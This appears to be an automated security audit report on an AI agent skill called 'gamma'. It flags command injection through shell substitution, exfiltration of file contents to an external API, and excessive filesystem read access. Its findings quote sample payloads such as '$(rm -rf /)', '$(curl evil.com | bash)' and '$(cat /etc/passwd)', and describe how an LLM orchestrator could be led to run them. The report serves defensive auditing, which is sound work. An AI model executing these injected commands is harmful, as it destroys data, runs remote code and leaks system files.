Security Audit

gamma

github.com/openclaw/skills

AI SkillCommit 13146e6a3d46

CAUTION

Scanned 2 months ago

Critical

Immediate action required

High

Priority fixes suggested

Medium

Best practices review

Low

Acknowledged / Tracked

Trust Assessment

gamma received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.

SkillShield's automated analysis identified 3 findings: 1 critical, 1 high, 1 medium, and 0 low severity. Key findings include Arbitrary Command Execution via Shell Substitution, Sensitive File Content Exfiltration to External API, Unrestricted File System Read Access.

The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.

Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.

Layer Breakdown

Manifest Analysis

100%

Static Code Analysis

100%

Dependency Graph

100%

LLM Behavioral Safety

48%

Behavioral Risk Signals

Network Access

2 findings

Filesystem Write

2 findings

Shell Execution

3 findings

Dynamic Code

1 finding

Excessive Permissions

1 finding

Security Findings3

Severity	Finding	Layer	Location
CRITICAL	Arbitrary Command Execution via Shell Substitution The skill's documentation and examples demonstrate passing user-controlled input to the `gamma.sh` script using shell command substitution (e.g., `$(cat pitch.md)`). An attacker could craft malicious input like `$(rm -rf /)` or `$(curl evil.com \| bash)` which would be executed by the shell before the `gamma.sh` script even starts, leading to arbitrary command execution on the host system. Avoid using shell command substitution for user-controlled input. Instead, pass content directly as a string argument, or use a temporary file if large content is needed, ensuring the file path is sanitized. The LLM orchestrator should be instructed to never use `$(...)` with untrusted input.	LLM	SKILL.md:52
HIGH	Sensitive File Content Exfiltration to External API The skill allows reading arbitrary local files via shell command substitution (e.g., `$(cat /etc/passwd)`) and then sends the content of these files to the external `public-api.gamma.app` endpoint. This poses a significant risk of exfiltrating sensitive data from the host system to a third-party service. Restrict the skill's ability to read local files. If file input is necessary, implement strict allow-listing for file paths or directories, and ensure content is sanitized before transmission. The LLM orchestrator should be instructed to never use `$(...)` with untrusted input.	LLM	SKILL.md:52
MEDIUM	Unrestricted File System Read Access The skill, through its demonstrated usage pattern (`$(cat file)`), implicitly grants itself unrestricted read access to the filesystem. This capability is excessive for a skill primarily designed to generate content from provided text, and it enables the data exfiltration and command injection risks identified. Re-evaluate the necessity of local file access. If required, implement strict access controls, sandboxing, or explicit user confirmation for file operations. The LLM orchestrator should be instructed to never use `$(...)` with untrusted input.	LLM	SKILL.md:52

Scan History

Embed Code

[![SkillShield](https://skillshield.io/api/v1/badge/1916a59c85cd950e.svg)](https://skillshield.io/report/1916a59c85cd950e)